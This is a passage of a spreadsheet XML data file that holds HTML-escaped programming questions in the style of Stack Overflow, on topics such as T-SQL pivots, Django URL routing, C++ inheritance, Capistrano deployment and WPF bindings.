&lt;p&gt;This code does &lt;em&gt;not&lt;/em&gt; work (the function behaves like an empty generator).&lt;/p&gt;
&lt;p&gt;Am I missing something?
Is there a way to turn the above recursive algorithm into a generator &lt;em&gt;without replacing it with an iterative one&lt;/em&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Shortcut for commenting CSS in VS 2008</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I press the standard Ctrl + E, C (an other variants) in VS2008 whilst editing a CSS file, it says that command is not available. How do I setup a shortcut to apply a plain old /* */ comment to selected text in VS? Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Summarize aggregated data</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a table like as follows:&lt;/p&gt;
&lt;pre&gt;
SoftwareName    Count    Country
Project         15       Canada
Visio           12       Canada
Project         10       USA
Visio           5        USA
&lt;/pre&gt;
&lt;p&gt;How do I query it to give me a summary like...&lt;/p&gt;
&lt;pre&gt;
SoftwareName    Canada    USA    Total
Project         15        10     25
Visio           12        5      17
&lt;/pre&gt;
&lt;p&gt;How to do in T-SQL?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I make UITableViewCellAccessoryDisclosureIndicator visible in black background?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;cell.accessoryType = UITableViewCellAccessoryDisclosureIndicator;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;in this method&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;- (UITableViewCell *)tableView:(UITableView *)tableView cellForRowAtIndexPath:(NSIndexPath *)indexPath;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but I can only see it when I select that cell otherwise it's not visible.and it work perfectly when background is white.
I am sure that I need to set a property, but I don't know which property I need to change to make this thing work.&lt;/p&gt;
&lt;p&gt;thanks in advance.&lt;/p&gt;
&lt;p&gt;cheers.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Django: Arbitrary number of unnamed urls.py parameters</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Django model with a large number of fields and 20000+ table rows.  To facilitate human readable URLs and the ability to break down the large list into arbitrary sublists, I would like to have a URL that looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/browse/&amp;lt;name1&amp;gt;/&amp;lt;value1&amp;gt;/&amp;lt;name2&amp;gt;/&amp;lt;value2&amp;gt;/ .... etc ....
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;where 'name' maps to a model attribute and 'value' is the search criteria for that attribute.  Each "name" will be treated like a category to return subsets of the model instances where the categories match.&lt;/p&gt;
&lt;p&gt;Now, this could be handled with GET parameters, but I prefer more readable URLs for both the user's sake and the search engines.  These URLs subsets will be embedded on each page that displays this model, so it seems worth the effort to make pretty URLs.&lt;/p&gt;
&lt;p&gt;Ideally each name/value pair will be passed to the view function as a parameter named &lt;code&gt;name1&lt;/code&gt;, &lt;code&gt;name2&lt;/code&gt;, etc.  However, I don't believe it's possible to defined named patterns via a regex's matched text.  Am I wrong there?&lt;/p&gt;
&lt;p&gt;So, it seems I need to do something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;urlpatterns = patterns('',
    url(r'^browse/(?:([\w]+)/([\w]+)/)+$', 'app.views.view', name="model_browse"),
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It seems this should match any sets of two name/value pairs.  While it matches it successfully, it only passes the last name/value pair as parameters to the view function.  My guess is that each match is overwriting the previous match.  Under the guess that the containing (?:...)+ is causing it, I tried a simple repeating pattern instead:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;urlpatterns = patterns('',
    url(r'^browse/([\w]+/)+$', 'app.views.view', name="model_browse"),
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;... and got the same problem, but this time &lt;code&gt;*args&lt;/code&gt; only includes the last matched pattern.&lt;/p&gt;
&lt;p&gt;Is this a limitation of Django's url dispatcher, and/or Python's regex support?  It seems either of these methods should work.  Is there a way to achieve this without hardcoding each possible model attribute in the URL as an optional (.*) pattern?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the fastest webserver solution with the lowest memory footprint?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need a webserver to serve up very simple POST/GET requests as JSON.  I don't need MVC, Rails, Django.   I need something that takes up very little memory, preferrably around 5K per reqeust. The webserver will talk to backend services like Scribe using Facebook Thrift.  Each http request will also access a SQLLite database, one for each user and user's data do not overlap.  It will serve up static html files as well as the json webservice.&lt;/p&gt;
&lt;p&gt;I am considering the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Njinx with PHP,&lt;/li&gt;
&lt;li&gt;Kepler from Lua,&lt;/li&gt;
&lt;li&gt;rolling my own with libevent or libev perhaps calling out to Lua, or&lt;/li&gt;
&lt;li&gt;MochiWeb.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Which of these options are best and what other options are out there?  I can use PHP, python, or Lua for basic scripting and even could do basic C.  I am leaning towards some sort of Erlang solution.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best .net Micro Framework dev board, for under $300?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a relativity cheap .net Micro Framework development board for use on a personal robotics project. I'd don't need much for I/O, but I want at least one serial port and one Ethernet port. &lt;/p&gt;
&lt;p&gt;I would prefer not to have to spend more than $300 on the board, but if there is an obvious reason to get a better one I'm flexible. &lt;/p&gt;
&lt;p&gt;Currently I'm looking at &lt;a href="http://www.sjjmicro.com/EDK.html"&gt;this device from SJJ Embedded Micro Solutions&lt;/a&gt;. Has anyone had experience with this device?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Translate SVN path to local file system path in Python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a utility in Python that will attach changed files in Subversion to an email and send it when a subset of folders that are under source control in SVN have been changed.  I am using the pysvn library to access the repository.&lt;/p&gt;
&lt;p&gt;I have a copy of the files on my local file system and I do an update to check if the files have changed since the last time the utility was run.&lt;/p&gt;
&lt;p&gt;I am at the point where I am translating the path names in SVN to the path names on my local copy.&lt;/p&gt;
&lt;p&gt;Currently I have written the following to do the job:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def formatPaths(self, paths):
    newPaths = list()
    for path in paths:
        path = path[len(self.basePath):]
        path = path.replace("/", "\\")
        newPaths.append(path)
    return newPaths
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;self.basePath would be something like "/trunk/project1" and I'm looking to just get the relative path of a subset of folders (I.e. folder1 under "/trunk/project1").&lt;/p&gt;
&lt;p&gt;Is this a good way to solve this problem or is there some magical function I missed?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>unions declaration C code</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have seen some declaration of a union inside a struct as follows. Example code given below.&lt;/p&gt;
&lt;p&gt;My questions is does it help in any memory savings(typical use for which a union is used for)? I do not see the benefit. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;typedef struct
{
    int x1;
    unsigned int x2;
    ourstruct1 ov1;
    ourstruct1 ov2;
    union
    {
            struct
            {
                mystruct1 v1;
                mystruct2 v2;
                mystruct3 v3;
                int* ctxSC;
                mystruct4 v4;
                Bool v5;
                Long v6;
                Long v7;
                Long v8;
                Long v9;
            }mystr;
    };
}structvar1;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;-AD&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Debugging a Direct3D Model</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to render a model in Direct3D using &lt;code&gt;DrawIndexedPrimitives&lt;/code&gt;. However, I am not able to see it on screen. What are the usual methods used to debug a Direct3D model?&lt;/p&gt;
&lt;p&gt;I've tried the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Switched off back face culling&lt;/li&gt;
&lt;li&gt;Used &lt;code&gt;PrimitiveType.LineStrip&lt;/code&gt; instead of &lt;code&gt;PrimitiveType.TriangleStrip&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Several combinations of View and Projection matrices.&lt;/li&gt;
&lt;li&gt;Used AutoCAD to plot the vertices as tiny spheres&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Prevent long word to add horizontal scroll to html view</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On Windows Mobile, I am displaying my output in HTML. This includes lots of user-generated strings. Occasionally there are situations where a really large string is part of the output that has no whitespaces or punctuation. &lt;/p&gt;
&lt;p&gt;Unfortunately the Windows Mobile's HTML view (htmlview.dll, based on Pocket Internet Explorer) does not break these long words down so they fit on screen. Instead a horizontal scrollbar is added and the user has to scroll sideways to see the whole word. This also affects other output which now also is spread along this larger screen width.&lt;/p&gt;
&lt;p&gt;Is there any possibility to either make the htmlview behave differently, or to force the word to break? CSS can be used. Regarding the forcing: The &amp;amp;shy; tag is ALWAYS inserting a "-" character and never causes a breaks, the &amp;lt;WBR&amp;gt; tag is not doing anything at all, &amp;amp;8203; is output as &amp;amp;8203:, empty tags like &lt;B&gt;&lt;/B&gt; also do nothing. Also it should be noted that this code is running on multiple screen sizes and due to other parts of the HTML output I am not 100% sure how much screen width I have left.&lt;/p&gt;
&lt;p&gt;P.S.: My app is compiled using the WM 5.0 SDK and is written in C++/Win32/MFC.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JavaME: Convert String to camelCase</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What would be a simple implementation of a method to convert a String like "Hello there everyone" to "helloThereEveryone". In JavaME support for String and StringBuffer utility operations are quite limited.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Looking for a better way than virtual inheritance in C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;OK, I have a somewhat complicated system in C++. In a nutshell, I need to add a method to a third party abstract base class. The third party also provides a ton of derived classes that also need the new functionality.&lt;/p&gt;
&lt;p&gt;I'm using a library that provides a standard Shape interface, as well as some common shapes.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Shape
{
    public:
        Shape(position);
        virtual ~Shape();
        virtual position GetPosition() const;
        virtual void SetPosition(position);
        virtual double GetPerimeter() const = 0;
    private: ...
};
class Square : public Shape
{
    public:
        Square(position, side_length);
    ...
};
class Circle, Rectangle, Hexagon, etc
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now, here's my problem. I want the Shape class to also include a GetArea() function. So it seems like I should just do a:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class ImprovedShape : public virtual Shape
{
    virtual double GetArea() const = 0;
};
class ImprovedSquare : public Square, public ImprovedShape
{
    ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And then I go and make an ImprovedSquare that inherits from ImprovedShape and Square. Well, as you can see, I have now created the dreaded &lt;a href="http://en.wikipedia.org/wiki/Diamond_problem" rel="nofollow"&gt;diamond inheritance problem&lt;/a&gt;. This would easily be fixed if the third party library used &lt;a href="http://en.wikipedia.org/wiki/Virtual_inheritance" rel="nofollow"&gt;virtual inheritance&lt;/a&gt; for their Square, Circle, etc. However, getting them to do that isn't a reasonable option.&lt;/p&gt;
&lt;p&gt;So, what do you do when you need to add a little functionality to an interface defined in a library? Is there a good answer?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to present credentials in order to open file?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I specify the username and password in order for my program to open
a file for reading?
The program that needs to access the file is running from an account that
does not have read access to the folder the file is in.
Program is written in C# and .NET 2, running under XP and file is on a Windows Server 2003 machine.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I record what process or kernel activity is using the disk in GNU/Linux?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On a particular Debian server, iostat (and similar) report an unexpectedly high volume (in bytes) of disk writes going on.  I am having trouble working out which process is doing these writes.&lt;/p&gt;
&lt;p&gt;Two interesting points:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Tried turning off system services one at a time to no avail.  Disk activity remains fairly constant and unexpectedly high.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Despite the writing, do not seem to be consuming more overall space on the disk.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Both of those make me think that the writing may be something that the kernel is doing, but I'm not swapping, so it's not clear to me what Linux might try to write.&lt;/p&gt;
&lt;p&gt;Could try out atop:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.atcomputing.nl/Tools/atop/"&gt;http://www.atcomputing.nl/Tools/atop/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;but would like to avoid patching my kernel.&lt;/p&gt;
&lt;p&gt;Any ideas on how to track this down?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I add fitnesse pages to version-control?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the recommended practice? Should I add the my sub-folder under the fitnesse folder to version control?    &lt;/p&gt;
&lt;p&gt;&lt;em&gt;Context: working on a single developer rails pet project. I've my rails project under version-control (Subversion) however my fitnesse wiki pages lie under the fitnesse program folder.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Fitnesse seems to have its own version-control... (I see numbered zips along with each of my wiki pages) Is it reliable? Where does it store the revisions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Efficient way to recursively calculate dominator tree?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using the Lengauer and Tarjan algorithm with path compression to calculate the dominator tree for a graph where there are millions of nodes. The algorithm is quite complex and I have to admit I haven't taken the time to fully understand it, I'm just using it. Now I have a need to calculate the dominator trees of the direct children of the root node and possibly recurse down the graph to a certain depth repeating this operation. I.e. when I calculate the dominator tree for a child of the root node I want to pretend that the root node has been removed from the graph.&lt;/p&gt;
&lt;p&gt;My question is whether there is an efficient solution to this that makes use of immediate dominator information already calculated in the initial dominator tree for the root node? In other words I don't want to start from scratch for each of the children because the whole process is quite time consuming.&lt;/p&gt;
&lt;p&gt;Naively it seems it must be possible since there will be plenty of nodes deep down in the graph that have idoms just a little way above them and are unaffected by changes at the top of the graph.&lt;/p&gt;
&lt;p&gt;BTW just as aside: it's bizarre that the subject of dominator trees is "owned" by compiler people and there is no mention of it in books on classic graph theory. The application I'm using it for - my FindRoots java heap analyzer - is not related to compiler theory.&lt;/p&gt;
&lt;p&gt;Clarification: I'm talking about directed graphs here. The "root" I refer to is actually the node with the greatest reachability. I've updated the text above replacing references to "tree" with "graph". I tend to think of them as trees because the shape is &lt;em&gt;mainly&lt;/em&gt; tree-like. The graph is actually of the objects in a java heap and as you can imagine is reasonably hierarchical. I have found the dominator tree useful when doing OOM leak analysis because what you are interested in is "what keeps this object alive?" and the answer ultimately is its dominator. Dominator trees allow you to &amp;lt;ahem&amp;gt; see the wood rather than the trees. But sometimes lots of junk floats to the top of the tree so you have a root with thousands of children directly below it. For such cases I would like to experiment with calculating the dominator trees rooted at each of the direct children (in the original graph) of the root and then maybe go to the next level down and so on. (I'm trying not to worry about the possibility of back links for the time being :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to convert a Unix timestamp to DateTime and vice versa?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There is this example code, but then it starts talking about millisecond / nanosecond problems.&lt;/p&gt;
&lt;p&gt;The same question is on MSDN, &lt;em&gt;&lt;a href="http://blogs.msdn.com/brada/archive/2004/03/20/93332.aspx"&gt;Seconds since the Unix epoch in C#&lt;/a&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;This is what I've got so far:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public Double CreatedEpoch
{
  get
  {
    DateTime epoch = new DateTime(1970, 1, 1, 0, 0, 0, 0).ToLocalTime();
    TimeSpan span = (this.Created.ToLocalTime() - epoch);
    return span.TotalSeconds;
  }
  set
  {
    DateTime epoch = new DateTime(1970, 1, 1, 0, 0, 0, 0).ToLocalTime();
    this.Created = epoch.AddSeconds(value);
  }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Align element under other element through css</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a really simple search form with the following&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Label ("Search")&lt;/li&gt;
&lt;li&gt;Textbox (fixed width)&lt;/li&gt;
&lt;li&gt;Submit button&lt;/li&gt;
&lt;li&gt;"Advanced" link&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Label, textbox and submit are all on one horizontal line and centered.
Now I would like my advanced link to be under the submit button.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Restrict adding control on Panel</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can i restrict adding controls in Panel in C# window controls? I have to restrict user to add controls in a panel at design time.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>An alternative to alert/confirm/error dialogs?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We all know that alerts are bad. If you didn't know it read &lt;a href="http://www.codinghorror.com/blog/archives/000114.html" rel="nofollow"&gt;this&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Alerts are used to communicate with the user. So if we don't use them what is a good alternative? &lt;/p&gt;
&lt;p&gt;I'd like to get a nice list of good alternatives to choose from when implementing something that requires user communications.&lt;/p&gt;
&lt;p&gt;I'll give one myself as an example and for everyone to use:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Case:&lt;/strong&gt; we need to validate user input before we can proceed.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Solution:&lt;/strong&gt; instead of showing an alert box when user clicks ok/next/submit show a clearly styled (eg. red on a white bg) "frame" around/next to the user input that has the invalid input with an informative text on what is wrong. To make it easier on the user the input in question should gain focus and if necessary moved back into view.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best programming methodology for very fast timeline and little requirements?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is a good programming methodology for custom applications that need to be coded very fast and very customized?  I realize the lack of requirements is a problem no matter what.  Also how do you convince management to change their practices? Next question is how to you get people to stop writing 5000 line single file programs?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is asp.net session information stored in a cookie?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I write &lt;code&gt;Session["asdf"] = 234;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;In my asp.net web app, does this mean the client will have a cookie stored on their browser?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET Ajax: close window after Ajax call?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using ASP.NET Ajax. How can I &lt;strong&gt;tell the browser to close the current window&lt;/strong&gt; after the server call finishes (server-side code)?&lt;/p&gt;
&lt;p&gt;I managed to do this using the ASP.NET Ajax's ScriptManager method "RegisterDataItem" in the server method (inside a button click handler):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sm.RegisterDataItem(ActionLabel, "action:closewindow")
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and a hidden Label and handling it this way on the client:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function PageLoadingHandler(sender, args)
{
    var dataItems = args.get_dataItems();
    if (dataItems['ActionLabel'] == 'action:closewindow') {
        window.close()
    }
}
Sys.WebForms.PageRequestManager.getInstance().add_pageLoading(PageLoadingHandler);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But it feels &lt;strong&gt;dirty&lt;/strong&gt;. There must be a more elegant way to do this.&lt;/p&gt;
&lt;p&gt;Thanks for any advice.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Single instance Amazon EC2</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We're running a lightweight web app on a single EC2 server instance, which is fine for our needs, but we're wondering about monitoring and restarting it if it goes down.&lt;/p&gt;
&lt;p&gt;We have a separate non-Amazon server we'd like to use to monitor the EC2 and start a fresh instance if necessary and shut down the old one. All our user data is on Elastic Storage, so we're not too worried about losing anything.&lt;/p&gt;
&lt;p&gt;I was wondering if anyone has any experience of using EC2 in this way, and in particular of automating the process of starting the new instance? We have no problem creating something from scratch, but it seems like it should be a solved problem, so I was wondering if anyone has any tips, links, scripts, tutorials, etc to share.&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Capistrano: How to Include common settings in multiple project deploy.rb files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;this is probably a newbie ruby question. I have several libraries and apps that I need to deploy to several different hosts. All of the apps and libs will share some common settings for those hosts-- e.g. host name, database server/user/pass, etc.&lt;/p&gt;
&lt;p&gt;My goal is to do something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;cap host1 stage deploy
cap host2 stage deploy
cap host1 prod deploy
# ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My question is how do you include these common settings in all of your deploy.rb files? More specifically, I want to create a an rb file that I can include that has some common settings and several host specific task definitions:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;set :use_sudo, false
# set some other options
task :host1 do
    role :app, "host1.example.com"
    role :web, "host1.example.com"
    role :db,  "host1.example.com", :primary =&amp;gt; true
    set :rodb_host, "dbhost"
    set :rodb_user, "user"
    set :rodb_pass, "pass"
    set :rodb_name, "db"
 end
 task :host2 do
     #...
 end
deploy.task :carsala do
    transaction do
        setup
        update_code
        symlink
    end
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And then "include" this file in all of my deploy.rb files where I define stage, prod, etc and overwrite any "common" configuration parameters as necessary. Any suggestions would be appreciated. I've tried a few different things, but I get errors from cap for all of them. &lt;/p&gt;
&lt;p&gt;Edit: I've tried &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;require 'my_module'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I get errors complaining about an undefined task object.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Correct approach to Properties</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working in Java on a fairly large project.  My question is about how to best structure the set of Properties for my application.&lt;/p&gt;
&lt;p&gt;Approach 1:  Have some static Properties object that's accessible by every class.  (Disadvantages: then, some classes lose their generality should they be taken out of the context of the application; they also require explicit calls to some static object that is located in a different class and may in the future disappear; it just doesn't &lt;em&gt;feel&lt;/em&gt; right, am I wrong?)&lt;/p&gt;
&lt;p&gt;Approach 2:  Have the Properties be instantiated by the main class and handed down to the other application classes.  (Disadvantages: you end up passing a pointer to the Properties object to almost every class and it seems to become very redundant and cumbersome; I don't &lt;em&gt;like&lt;/em&gt; it.)&lt;/p&gt;
&lt;p&gt;Any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JS Regex For Human Names</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a good JavaScript RegEx to convert names to proper cases.  For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;John SMITH = John Smith
Mary O'SMITH = Mary O'Smith
E.t MCHYPHEN-SMITH = E.T McHyphen-Smith  
John Middlename SMITH = John Middlename SMITH
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Well you get the idea.&lt;/p&gt;
&lt;p&gt;Anyone come up with a comprehensive solution?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to communicate with a sub subprocess with subprocess.Popen?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to write a python script that packages our software. This script needs to build our product, and package it. Currently we have other scripts that do each piece individually which include csh, and perl scripts. One such script is run like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sudo mod args
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;where mod is a perl script; so in python I would do &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;proc = Popen(['sudo', 'mod', '-p', '-c', 'noresource', '-u', 'dtt', '-Q'], stderr=PIPE, stdout=PIPE, stdin=PIPE)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem is that this mod script needs a few questions answered. For this I thought that the traditional &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(stdout, stderr) = proc.communicate(input='y')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;would work. I don't think it's working because the process that Popen is controlling is sudo, not the mod script that is asking the question. Is there any way to communicate with the mod script and still run it through sudo?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Lean Software (Webapplication) Release Engineering</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking to re-organize the way we release our internal software. All of the code (PHP webapps, some Java apps and Perl scripts) is checked into Subversion repositories but there are no branches or tags, everything is checked into trunk (only around 1-3 devs per app). On the production linux servers, the software is just directly run from a working svn copy (actually most of the changes happen there as well).&lt;/p&gt;
&lt;p&gt;Since we have a lot of small apps and release very often small changes to the running system, I'm looking for a very lean or transparent way to do some release engineering and to clean up this mess abit.&lt;/p&gt;
&lt;p&gt;Are there any tools out there that may help me to do so in a heterogenous environment (language-wise) like that? 
Or has anyone an idea how to do this in a proper way?&lt;/p&gt;
&lt;p&gt;Otherwise I'd thought of writing some release (shell) scripts that automatically create subversion tags from trunk and then do a checkout of the corresponding tag to the production servers. But that sounds kinda hack'ish as well to me.&lt;/p&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
&lt;p&gt;Haes.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Weird IE &amp; Javascript issue</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I'm creating some HTML using javascript based on where the user clicks on the page. On page load the script replaces an empty div with a ul and some data. The user clicks on that data to receive more and so on. Now when the user navigates off the page and then hits the back button to go back to the page, IE displays a blank page with the replaced divs, in all other browsers, FF, Opera, Safari, the page either reloads to the initial ul or goes back to the last state with the dynamic data in it.&lt;/p&gt;
&lt;p&gt;Anyone have an idea as to what might be happening here? Any help is appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you bind the TextWrapping property of a TextBox to the IsChecked value of a MenuItem?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The TextWrapping property of the TextBox has three possible values:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Wrap&lt;/li&gt;
&lt;li&gt;NoWrap&lt;/li&gt;
&lt;li&gt;WrapWithOverflow&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I would like to bind to the IsChecked property of a MenuItem.  If the MenuItem is checked, I want to set the TextWrapping property of a TextBox to Wrap.  If the MenuItem is not checked, I want to set the TextWrapping property of the TextBox to NoWrap.&lt;/p&gt;
&lt;p&gt;To sum up, I am trying to bind a control that has two states to two values of an enumeration that has more than two values.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;[edit]&lt;/strong&gt; I would like to accomplish this in XAML, if possible.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;[edit]&lt;/strong&gt; I figured out how to do this using an IValueConverter.  Perhaps there is a better way to do this?  Here is what I did:&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;In Window.Resources, I declared a reference to my ValueConverter.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;local:Boolean2TextWrapping x:Key="Boolean2TextWrapping" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In my TextBox, I created the binding to a MenuItem and included the Converter in the binding statement.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;TextWrapping="{Binding ElementName=MenuItemWordWrap, Path=IsChecked, Converter={StaticResource Boolean2TextWrapping}}"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and the ValueConverter looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class Boolean2TextWrapping : IValueConverter
    {
        public object Convert(object value, Type targetType, object parameter, CultureInfo cultureInfo)
        {
            if (((bool)value) == false)
            {
                return TextWrapping.NoWrap;
            }
            return TextWrapping.Wrap;
        }
        public object ConvertBack(object value, Type targetType, object parameter, System.Globalization.CultureInfo culture)
        {
            throw new NotImplementedException();
        }
    }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>right approach to handling bad xml data</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a little c# windows service that periodically pulls xml from a web service and stores the data in a database table.&lt;/p&gt;
&lt;p&gt;Unfortunately it's failing because the web service has occasional bad data in it - strings instead of decimals.  I don't have any control over the web service (unvalidated user input from software we can't change) but I would like to log the bad data so that it can be re-input.&lt;/p&gt;
&lt;p&gt;It's simple data that looks something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ROWS&amp;gt;
  &amp;lt;ROW&amp;gt;
    &amp;lt;COL1&amp;gt;5405&amp;lt;/COL1&amp;gt;
    &amp;lt;COL2&amp;gt;102.24&amp;lt;/COL1&amp;gt;
  &amp;lt;/ROW&amp;gt;
  &amp;lt;ROW&amp;gt;
    &amp;lt;COL1&amp;gt;5406&amp;lt;/COL1&amp;gt;
    &amp;lt;COL2&amp;gt;2.25&amp;lt;/COL1&amp;gt;
  &amp;lt;/ROW&amp;gt;
&amp;lt;/ROWS&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The table just has two columns, COL1 (NUMBER, 10), COL2 (NUMBER, 10,2).&lt;/p&gt;
&lt;p&gt;I was using a validating XmlReader and this XSD:   &lt;/p&gt;
&lt;pre&gt;&lt;code&gt; &amp;lt;?xml version="1.0" encoding="utf-8"?&amp;gt;
